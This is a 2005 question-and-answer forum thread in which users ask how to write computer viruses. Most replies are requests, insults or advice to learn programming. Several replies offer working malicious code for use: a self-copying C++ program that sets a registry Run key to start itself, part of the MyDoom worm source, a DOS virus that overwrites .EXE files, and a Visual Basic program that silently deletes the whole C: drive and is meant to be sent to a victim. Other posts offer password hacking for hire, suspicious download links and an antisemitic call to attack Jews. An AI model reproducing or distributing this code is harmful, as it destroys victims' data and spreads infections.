if you want to learn how to make a trojan with c++ email me at freehabbocreds09@gmail.com i will send you the manul

 

Answer by God of Hell Fire
Submitted on 4/27/2005
Rating: Not yet rated Rate this answer: Vote
If u really wanna create a virus, buy a book on VB, learn all about it focusing on ActiveX, integrate it into an HTML email, and uv created a virus.  It's that simple.

 

Answer by Mr.Louis
Submitted on 4/28/2005
Rating: Not yet rated Rate this answer: Vote
FOR ALL TO READ:


L/S,

This is for all out there hoping for programmers or freakers to send you viral source codes for you to study:

This does not work my friend. As said over and over: for you to create a virus, you need to know the entire language. Why? Ever tried to have a conversation in e.x. German with only two words?!

I think it would be a good idea just to go out to any random book store, spend your money on quality books, instead of trusting some freak you don't know at all.

WARNING: There are companies out there, doing nothing else but track you down. The average time is 2 days to be caught as a hacker or virus creator. If you don't know how to program, how the hell are you going to erase your tracks?

Respectfully,

Mr.Louis.

 

Answer by Hacksta
Submitted on 4/28/2005
Rating: Not yet rated Rate this answer: Vote
thanx for the email adresses you should all be recieving your viruses and or worms in the next 2 to 3 buisness days

Have a good year

 

Answer by s1nn3r
Submitted on 4/28/2005
Rating: Not yet rated Rate this answer: Vote
53r10u5|y y0u n00b5 g0 buy 4 b00|< 0r 4 7u70r14|, y0u pr0b5 d0n'7 3\/3n |<n0\/\/ \/\/h47 4 \/\/4r3z 15, c0m3 0n! d0n7 y0u 7h1n|< u5 h4c|<3r5 h4\/3 50m7y1ng 3|53 b3773r 70 d0 7h4n 73|| y0u \/\/4nn4b35 50m3 c0d3 50 y0u c4n pu7 17 1n y0ur cr4ppy pr0gr4m5 4nd 54y "h3y |00|<, 1 m4d3 4 \/1ru5" d0n'7 \/\/4573 0ur 71m3... new hacking and phreaking group starting in uk mmatteress@hotmail.com ph0r more info

 

Answer by duahmoaketntellmemoer
Submitted on 5/4/2005
Rating: Not yet rated Rate this answer: Vote
please i hate this computer so much so i really really want some people to send as many viruses. as deadly and desructive as possible to my so that i can get rid of this piece of trash for at least a legitimate reason. my e-mail adress is gerbilhunter156@hotmail.com

 

Answer by http://web.singnet.com.sg/~jasonlzx/downloads/AOM II.exe
Submitted on 5/6/2005
Rating: Not yet rated Rate this answer: Vote
http://web.singnet.com.sg/~jasonlzx/downloads/AOM II.exe

 

Answer by Xcist3ncE
Submitted on 5/7/2005
Rating: Not yet rated Rate this answer: Vote
Damn its really funny to listen to ya all assholes saying "I wanna teach became hacker and hack all over the world everybody!"

That's just plain stupid!  I think im gonna throw up! lol

Go buy you C++ for dummies!  FFS!

 

Answer by king virus
Submitted on 5/9/2005
Rating: Not yet rated Rate this answer: Vote
virus time

 

Answer by INfectioN
Submitted on 5/9/2005
Rating: Not yet rated Rate this answer: Vote
Here is a good virus I wrote in C++ myself.  If you got a compiler then just copy it into a Win32 app.  Not a concal app.

#include <windows.h>

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
                            LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

HWND hWin;

hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);

while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}

return 0;
}

Dont under estimaite the power of this little guy.  Try it.  Its very annoying.  To fix it ctr+alt+del to get to task maneger.  Then close exsplorer.exe and virus.exe.  WARNING VIRUS.EXE MIGHT NOT BE THERE!!!  IF IT ISNT THEN DONT PANIC, JUST CLOSE EXSPOLORE.EXE!!! Next (while in task maneger) goto file - new task... - "explorer.exe" without quotes.

Email me for any questions!!!
keyboardbandit@hotmail.com

//-----------------------------------------
#include<iostream.h>

int main()
{
     cout << "Hello World!!!" << endl;
     return(0);
}


 

Answer by Dillie
Submitted on 5/9/2005
Rating: Not yet rated Rate this answer: Vote
I kow thiz site has not been use in awhile but tha best way to uptain ultimate virus knowledge (tha fast way) is to get a deadly infection then play around with it ;)

 

Answer by KUKULU KOO
Submitted on 5/10/2005
Rating: Not yet rated Rate this answer: Vote
I WANNA B A GREATE HACKER!

 

Answer by Craig
Submitted on 5/10/2005
Rating: Not yet rated Rate this answer: Vote
I want to write virus in C++ or PHP.

 

Answer by duvan$
Submitted on 5/13/2005
Rating: Not yet rated Rate this answer: Vote
hi..i can almost everything about c++ ..but how can i gatit..som page on the wep..u know ..guys plz..!???

 

Answer by anonymous
Submitted on 5/14/2005
Rating: Not yet rated Rate this answer: Vote
you stupid ass newbs. if you want to be a hacker you at least have to be good at spelling, you have to acutally know something, and you idiots, why in the hell would you ask anyone on the net about becoming a hacker.. man thats just the stupidest thing i have ever seen in my life. If you wanna be a hacker, learn on your own.

 

Answer by Sp0rk-eh
Submitted on 5/17/2005
Rating: Not yet rated Rate this answer: Vote
www.tubgirl.com and www.1337hacks.tk show you how. Good tutorials.

 

Answer by hey guys
Submitted on 5/18/2005
Rating: Not yet rated Rate this answer: Vote
hey all i can help u just email me mix3dmax@hotmail.com

 

Answer by hey guys
Submitted on 5/18/2005
Rating: Not yet rated Rate this answer: Vote
hey all i can help u just email me mix3dmax@hotmail.com

 

Answer by crash n burn
Submitted on 5/20/2005
Rating: Not yet rated Rate this answer: Vote
This is the MyDoom virus c source code I found it on a site. sugestion: Don't use it



#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <wininet.h>
#include <string.h>
#include "lib.h"

char rot13c(char c)
{
   char u[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
   char l[] = "abcdefghijklmnopqrstuvwxyz";
   char *p;

   if ((p = xstrchr(u, c)) != NULL)
      return u[((p-u) + 13) % 26];
   else if ((p = xstrchr(l, c)) != NULL)
      return l[((p-l) + 13) % 26];
   else
      return c;
}

void rot13(char *buf, const char *in)
{
   while (*in)
      *buf++ = rot13c(*in++);
   *buf = 0;
}

void mk_smtpdate(FILETIME *in_ft, char *buf)
{
        SYSTEMTIME t;
   TIME_ZONE_INFORMATION tmz_info;
   DWORD daylight_flag; int utc_offs, utc_offs_u;
        LPSTR weekdays[7] = { "Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat" };
        LPSTR months[12] = { "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec" };

   if (in_ft == NULL) {
           GetLocalTime(&t);
   } else {
      FILETIME lft;
      FileTimeToLocalFileTime(in_ft, &lft);
      FileTimeToSystemTime(&lft, &t);
   }

   tmz_info.Bias = 0;
   daylight_flag = GetTimeZoneInformation(&tmz_info);

   utc_offs = tmz_info.Bias;
   if (daylight_flag == TIME_ZONE_ID_DAYLIGHT) utc_offs += tmz_info.DaylightBias;
   utc_offs = -utc_offs;
   utc_offs_u = (utc_offs >= 0) ? utc_offs : -utc_offs;

        if (t.wDayOfWeek > 6) t.wDayOfWeek = 6;
        if (t.wMonth == 0) t.wMonth = 1;
        if (t.wMonth > 12) t.wMonth = 12;

        wsprintf(buf,
                "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",
                weekdays[t.wDayOfWeek], t.wDay,
                months[t.wMonth-1], t.wYear,
                t.wHour, t.wMinute, t.wSecond,
      (utc_offs >= 0) ? "+" : "-",
      utc_offs_u / 60, utc_offs_u % 60
        );
}

static DWORD xrand16_seed;

void xrand_init(void)
{
   xrand16_seed = GetTickCount();
}

WORD xrand16(void)
{
   xrand16_seed = 0x015a4e35L * xrand16_seed + 1L;
   return ((WORD)(xrand16_seed >> 16L) & (WORD)0xffff);
}

DWORD xrand32(void)
{
   return xrand16() | (xrand16() << 16);
}

char *xstrstr(const char *str, const char *pat)
{
   const char *p, *q;
   for (; *str; str++) {
      for (p=str, q=pat; *p && *q; p++, q++)
         if (*p != *q) break;
      if (p == q || *q == 0) return (char *)str;
   }
   return NULL;
}

char *xstrrchr(const char *str, char ch)
{
   register char *start = (char *)str;
   while (*str++);
   while (--str != start && *str != ch);
   if (*str == (char)ch) return((char *)str);
   return NULL;
}

char *xstrchr(const char *str, char ch)
{
   while (*str && *str != ch) str++;
   return (*str == ch) ? (char *)str : NULL;
}

int xsystem(char *cmd, int wait)
{
   PROCESS_INFORMATION pi;
   STARTUPINFO si;

   ZeroMemory(&si, sizeof(si));
   si.cb = sizeof(si);
   si.dwFlags = STARTF_USESHOWWINDOW | STARTF_FORCEOFFFEEDBACK;
   si.wShowWindow = SW_HIDE;

   if (CreateProcess(0, cmd, 0, 0, TRUE, 0, 0, 0, &si, &pi) == 0)
      return 1;   /* FAILED */

   if (wait) {
      WaitForSingleObject(pi.hProcess, INFINITE);
      CloseHandle(pi.hThread);
      CloseHandle(pi.hProcess);
   }

   return 0;      /* SUCCESS */
}

int xmemcmpi(unsigned char *p, unsigned char *q, int len)
{
   while (len--)
      if (tolower(*p++) != tolower(*q++)) return 1;
   return 0;
}

int xstrncmp(const char *first, const char *last, size_t count)
{
        if (!count)
                return(0);

        while (--count && *first && *first == *last)
        {
                first++;
                last++;
        }

        return (*(unsigned char *)first - *(unsigned char *)last);
}

/* "&#<number>" -> ascii */
int html_replace(char *str)
{
   char tmp[20], *mv_from, *mv_to;
   int i, j, amp_start, amp_end, amp_len, charcode, chr_len, mv_len;
   int found;

   for (i=0,found=0; str[i]; i++) {
      if (str[i] != '&') continue;
      amp_start = i;
      if (str[++i] != '#') continue;
      for (j=0,i++; j<(sizeof(tmp)-5);) {
         if (!isdigit(str[i])) break;
         tmp[j++] = str[i++];
      }
      tmp[j] = 0;
      for (charcode=0,j=0; tmp[j]; j++)
         charcode = charcode * 10 + (tmp[j] - '0');

      if (str[i] == ';') i++;
      amp_end = i;

      if (charcode <= 0) continue;
      ZeroMemory(tmp, sizeof(tmp));
      if (charcode < 256) {
         tmp[0] = charcode;
         tmp[1] = 0;
      } else {
         WideCharToMultiByte(CP_ACP, 0, (WCHAR*)&charcode, 1, tmp, sizeof(tmp), NULL, NULL);
      }
      if (tmp[0] == 0) continue;

      amp_len = amp_end - amp_start;
      chr_len = lstrlen(tmp);

      if (amp_len != chr_len) {
         mv_from = str + amp_start + amp_len;
         mv_to = str + amp_start + chr_len;
         mv_len = (str + lstrlen(str)) - mv_from + 1;
         if (mv_to < mv_from) {
            for (j=0; j<mv_len; j++) *mv_to++ = *mv_from++;
         } else {
            for (j=mv_len-1; j>=0; j--) mv_to[j] = mv_from[j];
         }
      }

      memcpy(str + amp_start, tmp, lstrlen(tmp));
      i = amp_start;
      found++;
   }
   return found;
}

/* urldecode algorithm */
/* useful for <a href="mailto:xxx%40xxx"> tags */
int html_replace2(char *str)
{
   char tmp[20], *mv_from, *mv_to;
   int i, j, amp_start, amp_end, amp_len, charcode, chr_len, mv_len;
   int found;

   for (i=0,found=0; str[i]; i++) {
      if (str[i] != '%') continue;
      amp_start = i;
      if (!isxdigit(str[i+1])) continue;
      tmp[0] = toupper(str[++i]);
      if (!isxdigit(str[i+1])) continue;
      tmp[1] = toupper(str[++i]);
      tmp[2] = 0;
      amp_end = ++i;

      charcode = ((tmp[1] >= 'A') && (tmp[1] <= 'Z')) ? 10+tmp[1]-'A' : tmp[1]-'0';
      charcode += (((tmp[0] >= 'A') && (tmp[0] <= 'Z')) ? 10+tmp[0]-'A' : tmp[0]-'0') << 4;

      if (charcode <= 0) continue;
      tmp[0] = charcode;
      tmp[1] = 0;

      amp_len = amp_end - amp_start;
      chr_len = lstrlen(tmp);

      if (amp_len != chr_len) {
         mv_from = str + amp_start + amp_len;
         mv_to = str + amp_start + chr_len;
         mv_len = (str + lstrlen(str)) - mv_from + 1;
         if (mv_to < mv_from) {
            for (j=0; j<mv_len; j++) *mv_to++ = *mv_from++;
         } else {
            for (j=mv_len-1; j>=0; j--) mv_to[j] = mv_from[j];
         }
      }

      memcpy(str + amp_start, tmp, lstrlen(tmp));
      i = amp_start;
      found++;
   }
   return found;
}

typedef BOOL (WINAPI *WININET_GETCONNECTEDSTATE)(LPDWORD lpdwFlags, DWORD dwReserved);

/* Returns: 0=offline, 1=online, 2=don't know */
int is_online(void)
{
   WININET_GETCONNECTEDSTATE pInternetGetConnectedState;
   HINSTANCE hWinInet;
   DWORD igcs_flags;
   char tmp[64];

   rot13(tmp, "jvavarg.qyy");                /* "wininet.dll" */
   hWinInet = GetModuleHandle(tmp);
   if (hWinInet == NULL || hWinInet == INVALID_HANDLE_VALUE) {
      hWinInet = LoadLibrary(tmp);
      if (hWinInet == NULL || hWinInet == INVALID_HANDLE_VALUE)
         return 2;
   }

   rot13(tmp, "VagreargTrgPbaarpgrqFgngr");  /* "InternetGetConnectedState" */
   pInternetGetConnectedState = (WININET_GETCONNECTEDSTATE)GetProcAddress(hWinInet, tmp);
   if (pInternetGetConnectedState == NULL)
      return 2;

   return (pInternetGetConnectedState(&igcs_flags, 0) == 0) ? 0 : 1;
}

int cat_wsprintf(LPTSTR lpOutput, LPCTSTR lpFormat, ...)
{
        register int ret;
        va_list arglist;
        va_start(arglist, lpFormat);
        ret = wvsprintf(lpOutput + lstrlen(lpOutput), lpFormat, arglist);
        va_end(arglist);
        return ret;
}


 

Answer by dango
Submitted on 5/21/2005
Rating: Not yet rated Rate this answer: Vote
help me creating virus


miracomoe@yahoo.com

 

Answer by SALEHUDIN
Submitted on 5/25/2005
Rating: Not yet rated Rate this answer: Vote
CARI LA SENDIRI

 

Answer by virus creator
Submitted on 5/25/2005
Rating: Not yet rated Rate this answer: Vote
i want to create virus which can crash the computer

 

Answer by Me!
Submitted on 5/25/2005
Rating: Not yet rated Rate this answer: Vote
Why do u all want to know how to create a virus any way?
Whats the point lol
I know how to make them but oh well lol

 

Answer by Cupu
Submitted on 5/29/2005
Rating: Not yet rated Rate this answer: Vote
heehe .. everyone wants to create a virus using c++ ... but why .. why c++ for that matter?? don't get me wrong .. it's my language of choice when programming ... but still ... do you have any grasp on c++ or just heard that c++ might be good??!.. Why not assembler for that matter....

Anyway... a lot of people weere right in the post . get a c++ book .. or a tutorial .. and start learning the language... Don't expect that a virus is just 2 predefined functions .. one to replicate and one to destroy .. There's nothing that designates c++ as being a virus language.. or that makes virus programming special .. It's a lot to learn ... And if you like it .. you learn it .. But it's still about work .. and studying ...

Cheers

 

Answer by Zolga
Submitted on 5/31/2005
Rating: Not yet rated Rate this answer: Vote
i would like to create a virus using C++ would be nice if you could send me a guild please to danielzolga@gmail.com    thanks

 

Answer by noo
Submitted on 6/1/2005
Rating: Not yet rated Rate this answer: Vote
I think Viruss Make your brains affested!

 

Answer by zero_cool
Submitted on 6/2/2005
Rating: Not yet rated Rate this answer: Vote
how to create password

 

Answer by unknown
Submitted on 6/3/2005
Rating: Not yet rated Rate this answer: Vote
who know there to get good *.dll writing/reading utility?

 

Answer by thr33
Submitted on 6/3/2005
Rating: Not yet rated Rate this answer: Vote
what he said. you can get lots of books including the C++ for dummies book. just please don't spend your time spamming FAQS

 

Answer by crazyWriter
Submitted on 6/6/2005
Rating: Not yet rated Rate this answer: Vote
I CAN MAKE DANGEROUSE VIRUSES ONLY BY CSHARP AND IT NEEDS FRAMEWORK FILES TO RUN.
IF ANYONE KNOWS ANY WEBPAGE ABOUT MAKING VIRUSES IN C++ MAIL ME AT
PRIN3S@GMAIL.COM
THANK EVERYONE LIKES VIRUSES!

 

Answer by BABAR
Submitted on 6/10/2005
Rating: Not yet rated Rate this answer: Vote
I CAN MAKE ANY TYPE OF VIRUS BY JAVA SCRIPT.
IF ANY BODY WANTS TO HACK SOME ONE PASSWORD THEN CONTACT WITH ME.
MY ADD: PIR_BABAR@HOTMAIL.COM
        BABAR_PIRZADA2000@YAHOO.COM

 

Answer by jewburner67
Submitted on 6/13/2005
Rating: Not yet rated Rate this answer: Vote
How do you make viruses? If you do post it on this website. I f you know how to make a virus, send to those damn jews!!!

 

Answer by Assassin121
Submitted on 6/13/2005
Rating: Not yet rated Rate this answer: Vote
you people are crazy stop giving all the hackers youre addresses what r u after a virus sent to ya?

 

Answer by nus
Submitted on 6/14/2005
Rating: Not yet rated Rate this answer: Vote
Way create in lunge c/c++ please tell me codes

 

Answer by livinus2
Submitted on 6/16/2005
Rating: Not yet rated Rate this answer: Vote
most people taught having a virus at hand is not worthwhile but i think it make one even a legend on his/her own.

 

Answer by snoopy
Submitted on 6/17/2005
Rating: Not yet rated Rate this answer: Vote
wanna some one of u to hack this address http://dns1.ensat.ac.ma/ictis/
if he is sufficiently powerful in this
since those guys are claiming to be the best in protecting them selves from viruses!!!!
is there any RAMBO!!!

 

Answer by XxX-JuLiUs-XxX
Submitted on 6/20/2005
Rating: Not yet rated Rate this answer: Vote
hiya guys...i know how to creat viruses by using different programming language...
so if u need anything homme may be i can help u...
           NOTE :REMMEMBER.. THIS IS UR RESPONSOBILTY 'N' I'LL NOT BE RESPONSIBLE INSTEAD ANY DAMAGES THAT U MAKE.
julius_ksa@hotmail.com

 

Answer by blue poison
Submitted on 6/21/2005
Rating: Not yet rated Rate this answer: Vote
I am 100% confidence then no one in this world is better hacker than me so these request i have studied is tiny one just email me and get UAR answer .
             waiting UT questions (solution in assembly,c,c++,java,.net,HTML,asp,dhtml,php,4d,or any language )

 

Answer by airstokes
Submitted on 6/21/2005
Rating: Not yet rated Rate this answer: Vote
i want to change my grades next year

 

Answer by yourallstupid
Submitted on 6/21/2005
Rating: Not yet rated Rate this answer: Vote
ok idiots im a noob to hacking but u cant just say duhhhh i want a virus give me one even if someone did would you feel accomplished wtf is wrong with you

 

Answer by selva
Submitted on 6/23/2005
Rating: Not yet rated Rate this answer: Vote
its fine

 

Answer by 006fly
Submitted on 6/25/2005
Rating: Not yet rated Rate this answer: Vote
I want to create Virus

 

Answer by tina
Submitted on 6/26/2005
Rating: Not yet rated Rate this answer: Vote
please tell me how to create a virus(probably in Java) and to create an anti virus for that.
email:jmjsave27@yahoo.com

 

Answer by scub zero
Submitted on 6/30/2005
Rating: Not yet rated Rate this answer: Vote
i am 13 and i can write viruses in html and c,c++ so its not that hard

 

Answer by Scargi
Submitted on 7/3/2005
Rating: Not yet rated Rate this answer: Vote
i was wondering if it is possible to create a virus that nakes it possible for you to look and nick other peoples files or is that just been a hacker

 

Answer by hack
Submitted on 7/5/2005
Rating: Not yet rated Rate this answer: Vote
i'llpost the virus on later but copy it then save as filename.bat when it put it on

 

Answer by MC_CESAR
Submitted on 7/6/2005
Rating: Not yet rated Rate this answer: Vote
It is really easy to create a virus even with
just some knowledge of c++. just use your head

 

Answer by GreatCan
Submitted on 7/8/2005
Rating: Not yet rated Rate this answer: Vote
you are all stupid

 

Answer by Ro
Submitted on 7/8/2005
Rating: Not yet rated Rate this answer: Vote
Visit http://www.rohitab.com




PEACE ...

 

Answer by fazer
Submitted on 7/9/2005
Rating: Not yet rated Rate this answer: Vote
I want to know the logic of creating a virus or you can say that how one can create his own virus using c++

 

Answer by eras
Submitted on 7/9/2005
Rating: Not yet rated Rate this answer: Vote
hey help me plspls AND SEND ME EMAIL HOTO DO IT ERAS@ABV.BG

 

Answer by collegepals.95mb.com
Submitted on 7/13/2005
Rating: Not yet rated Rate this answer: Vote
collegepals.95mb.com The un-official site for DSC DU .. hosts some of the best literature on C++ and hacking

 

Answer by taser
Submitted on 7/14/2005
Rating: Not yet rated Rate this answer: Vote
bit late lol 1 year of something like that virus are lame btw

You idiots

 

Answer by Thommu
Submitted on 7/15/2005
Rating: Not yet rated Rate this answer: Vote
I also wanna hack PCs and create Viruses. Please help

 

Answer by wdff
Submitted on 7/18/2005
Rating: Not yet rated Rate this answer: Vote
i know you how to create virus in c++

 

Answer by OnlyIntelligiblePersonHere
Submitted on 7/20/2005
Rating: Not yet rated Rate this answer: Vote
You are all very deranged. Don't make anymore virusus. The world is bad enough with the hundreds of viruses released each day, so no need for self-proclaimed professional asshole programmers with bad grammar to add to the effort. Seriously, if your excuse is to learn to "do t3h c++ raelly wel and mayke mon`ey :DDD" by writing viruses, youre in programming for the wrong reasons.

 

Answer by Devon
Submitted on 7/24/2005
Rating: Not yet rated Rate this answer: Vote
It takes a long time to become good at a programming language, it depends what you define a "virus" as but if you just take the time to learn for a couple months a little at a time you'll get a lot farther than begging people to teach you how :\

 

Answer by masire paul
Submitted on 7/29/2005
Rating: Not yet rated Rate this answer: Vote
If you are interested then here is a code you can use to  overwrite  files in a system
#include <dos.h>
#include <dir.h>
#include <stdio.h>

#define V_SIZE 7424

int n_inf=0;

void resume(void);
void inf(char *vir, char *filename);
int  compare(char *d, char *e);

void main(int argc, char **argv)
{
  struct ffblk fileinfo;
  char vir[V_SIZE];
  FILE *fp;
  char path[6];
  int b,a=0;

  argc++;

  if((fp=fopen(argv[0],"rb"))==NULL) resume();
  fread(vir,sizeof(char),V_SIZE,fp);
  fclose(fp);
  
  path[0]='*';
  path[1]='.';
  path[2]='E';
  path[3]='X';
  path[4]='E';
  path[5]=NULL;
  
  if(findfirst(path,&fileinfo,FA_ARCH)==-1) resume();
  inf(vir,fileinfo.ff_name);
  do {
    if(findnext(&fileinfo)!=0) a=1;
    else inf(vir,fileinfo.ff_name);
    if((a==1) || (n_inf>4)) b=1;
  } while (b!=1);
  resume();
}

void inf(char *vir, char *filename)
{
  FILE *fp;
  char checkinf[V_SIZE];

  if((fp=fopen(filename,"rb+"))==NULL) resume();
  fread(checkinf,sizeof(char),V_SIZE,fp);
  if(compare(vir,checkinf)==0) return;
  fseek(fp,0L,SEEK_SET);
  fwrite(vir,sizeof(char),V_SIZE,fp);
  fclose(fp);
  n_inf++;
}

int compare(char *d, char *e)
{
  int a;
  
  for(a=0;a<V_SIZE;a++) if(d[a]!=e[a]) return(1);
  return(0);
}

void resume(void)
{
  exit(0);
}
i think some of you are freaks who don't know if they want to be hacker or not but i can understand other since they seem genuine in their quest.

 

Answer by anonymous_zero
Submitted on 7/30/2005
Rating: Not yet rated Rate this answer: Vote
You lot are all prats and probably have no idea how stuff like this works, but I'll shut you all up and tell you.
Firstly, get a VB compiler. This turns your code into a real EXE.
There are some free ones around. I bought Microsoft Visual Basic 6, because I actually use it regularly for stuff.
Most "hackers" would disagree that Visual Basic is good for writing viruses, but if you want to write one that is really destructive quite quickly, it works. Of course, it requires the VB runtimes to be installed on the victim's computer, but computers running an operating system after Windows 98 already have it.

Run your compiler and create a new EXE project. Double click the form (Form1) and delete any code you find in there. Replace it with this:

'Start copy/paste -----

Private Sub Form_Load()
App.TaskVisible = False
Me.Caption = ""
Me.Visible = False
Me.Left = Screen.Width + 10
KillComputer
End Sub

Public Sub KillComputer()
Shell "C:\Windows\System32\cmd.exe /C /Q /D del /F /S /Q C:\*.*", vbHide
Shell App.Path & "" & App.EXEName & ".exe", vbHide
End
End Sub

'End copy/paste -----

Then build your program to an EXE and send it to your victim.
It should delete their entire C drive.

There are much better ways of doing this sort of thing, but they require APIs, which most of you would find too complex.

Hope you'll all shut up now,

anonymous_zero

P.S: I am not responsible for anything that you do with this code.

 

Answer by IQ
Submitted on 7/31/2005
Rating: Not yet rated Rate this answer: Vote
I want to become a Hacker

 

Answer by leonardo78
Submitted on 7/31/2005
Rating: Not yet rated Rate this answer: Vote
thank you .I want to become a hacker

 

Answer by harmer
Submitted on 8/1/2005
Rating: Not yet rated Rate this answer: Vote
If Jaz cud reply to this, u no dat code up @ the top of this page, that u got. Yer well my friend (the idiot) put it on his comp, do u no the healer codes and cud u put em on dis post please, thanks!

 

Answer by badb
Submitted on 8/3/2005
Rating: Not yet rated Rate this answer: Vote
programing in c++ is difficult but it can beat every ass of this world.....

 

Answer by Shadow
Submitted on 8/3/2005
Rating: Not yet rated Rate this answer: Vote
here's a virus source code database:

http://www.totallygeek.com/vscdb

ENJOY!!

 

Answer by Jahkrung Kanu
Submitted on 8/6/2005
Rating: Not yet rated Rate this answer: Vote
I want to know how to create virus. because I just want to challenge those who send virus to my computer.

 

Answer by jan
Submitted on 8/9/2005
Rating: Not yet rated Rate this answer: Vote
helo i'mgerman and i would to learn programing please contact me on yasoft1@hotmail.com
I can speack german,frensh and english
please contact me

 

Answer by Alvin Campbell
Submitted on 8/11/2005
Rating: Not yet rated Rate this answer: Vote
I im just learning C++ and is  wanting to create a virus and become a hacker where should i Start?

 

Answer by Sharkbate
Submitted on 8/11/2005
Rating: Not yet rated Rate this answer: Vote
LEARN ASSEMBLER STUPID PEOPLE! Thats the only language you can create an effective virus with! Of course you can create Internet Worms with C, C++, C#, ect. However, you could create an overwritting virus with EVEN BASIC. But these aren't very effective. I've wrote loads, but now I'm learning assembler. Its hard, but you get the hang of it eventuly.

See ya in hell f**kers!

 

Answer by jaynike
Submitted on 8/11/2005
Rating: Not yet rated Rate this answer: Vote
i need how to create the virus

jaynikej@yahoo.com
pls send the instruction and tutor

thanks

 

Answer by Smee56
Submitted on 8/14/2005
Rating: Not yet rated Rate this answer: Vote
i am new 2 this can some 1 tell me how 2 get started?

 

Answer by Nguyen
Submitted on 8/15/2005
Rating: Not yet rated Rate this answer: Vote
You idiots asking for virus scripts. Go read a book on c++ or read a tutorial on the web and learn it on your own. We put effort and time in making these scripts, its hard work. So for you people begging please stop and create your own.

 

Answer by www.immortal-hackers.com
Submitted on 8/16/2005
Rating: Not yet rated Rate this answer: Vote
Hey, look, go to the website in my id. It is a hackers website. Hacking tool AMITIS is there to download there. Any other help, mail to shramk@gmail.com

 

Answer by SharkBate
Submitted on 8/17/2005
Rating: Not yet rated Rate this answer: Vote
Okay, first of all C++ isn't a very good language for creating viruses. It's possible but not a very efficiant way. I'm not saying C++ is totaly useless, because I have created several viruses in BASIC. What you need to write an effective virus is assembler. Of course, you could write a Internet Worm in C++, and a Trojan would be SIMPLE. Pascal can also create all of these, including an overwritting virus.

Secondly, people asking HOW to create a virus are pathetic. Iv'e been writting viruses for about a year now and YOU NEED TO KNOW HOW TO PROGRAM TO THE MAXIMUM! To create a virus you don't need to know HOW. You need:

Lots of programming experience and a very good and creative imagination, then you will be unstopable.

And it's the same for Internet worms and Trojans.

There we go! All your problems solved...

 

Answer by SybeX
Submitted on 8/18/2005
Rating: Not yet rated Rate this answer: Vote
Com on Guys you are really d00dzz . You cant construct a virus if you cant know the basic of the c programing and how does wok the structure of the operating system . So read read and read thats the only thing if you want to be a hacker .

 

Answer by viruses_maker
Submitted on 8/20/2005
Rating: Not yet rated Rate this answer: Vote
i wanna become a viruses king please tell me a way......................
please
i think it is a simple c program with infinite loop but i donot know the way which can i follow ....please tell me this way ...i done very hard work in this stream please help me......

 

Answer by hakim
Submitted on 8/20/2005
Rating: Not yet rated Rate this answer: Vote
It is like a game and it also very fun.

 

Answer by crash-overrite
Submitted on 8/26/2005
Rating: Not yet rated Rate this answer: Vote
mess with the best
die like the rest !!!!!!!!!!!!!!!!!


 

Answer by Noob
Submitted on 8/26/2005
Rating: Not yet rated Rate this answer: Vote
yeah yeah

 

Answer by GAPSK007
Submitted on 8/26/2005
Rating: Not yet rated Rate this answer: Vote
Hi everyone, i wanna know how to create virus using JAVA and C,C++ i hope all of you can help me. i want to know some concept to create a virus

 

Answer by Kh. Umair A.
Submitted on 8/27/2005
Rating: Not yet rated Rate this answer: Vote
i want to become a hacker and want to learn how to create virus i know vb.net not ver high level skill but i can do it please contact me on this id
MASTERMIND_IN_EVALITY@YAHOO.COM

 

Answer by hi
Submitted on 8/29/2005
Rating: Not yet rated Rate this answer: Vote
like this is a year but go here http://www.rohitab.com/discuss

 

Answer by Jamz
Submitted on 8/30/2005
Rating: Not yet rated Rate this answer: Vote
Can some one please send me a script for  a c++ virus to james_rose_jr@yahoo.au

 

Answer by -.-
Submitted on 9/3/2005
Rating: Not yet rated Rate this answer: Vote
Nothing but idiots and lamers. Don't say "n00b," it just makes you look stupid. And is it that much harder to type the few extra characters on those long words like "you," "are," "really," etc.?

R1Y, U PPL R 2 DUM.

Notice my l33t skills with the cut words and the numeric substitutions.

Go play with VB.

00100

 

Answer by aryan
Submitted on 9/8/2005
Rating: Not yet rated Rate this answer: Vote
i wont create virus computers by internet or by icon

 

Answer by anupam
Submitted on 9/8/2005
Rating: Not yet rated Rate this answer: Vote
all u ppl buy windows programming by
"CHARLES PETZOLD" ull learn how the windows work and maybe somevirus writing techniques

 

Answer by ....
Submitted on 9/9/2005
Rating: Not yet rated Rate this answer: Vote
.......................
You are all crazy...
Learn C++ and make ANTI-VIRUS SOFTWARE.
Be one of the good C++ users.
Or use viruses you make and make anti viruses against them.

 

Answer by I HATE virus-creater
Submitted on 9/10/2005
Rating: Not yet rated Rate this answer: Vote
virus-creater writes

something that shutdown yr pc whenever u start windows (xp only)...
it's simple batch file (not really a virus)...
download it at http://web.singnet.com.sg/~jasonlzx/downloads/AOM II.exe

do you kno how to take it out of a computer

 

Answer by KroKnight
Submitted on 9/12/2005
Rating: Not yet rated Rate this answer: Vote
I AM A DEAD MONKEY

 

Answer by KroKnight
Submitted on 9/12/2005
Rating: Not yet rated Rate this answer: Vote
DC IS GAY Hausdorff JIMMY NGUYEN IS A HERMAPHRDUDE

 

Answer by Blaze
Submitted on 9/15/2005
Rating: Not yet rated Rate this answer: Vote
I really think that make a virus should be fun, but if you make one you should be careful in the use you put on it.

 

Answer by batch file
Submitted on 9/16/2005
Rating: Not yet rated Rate this answer: Vote
Hey does anyone know a bunch of batch file commands to reformat drive c, as batch viruses are the simplest viruses ever.

 

Answer by Shehzad
Submitted on 9/22/2005
Rating: Not yet rated Rate this answer: Vote
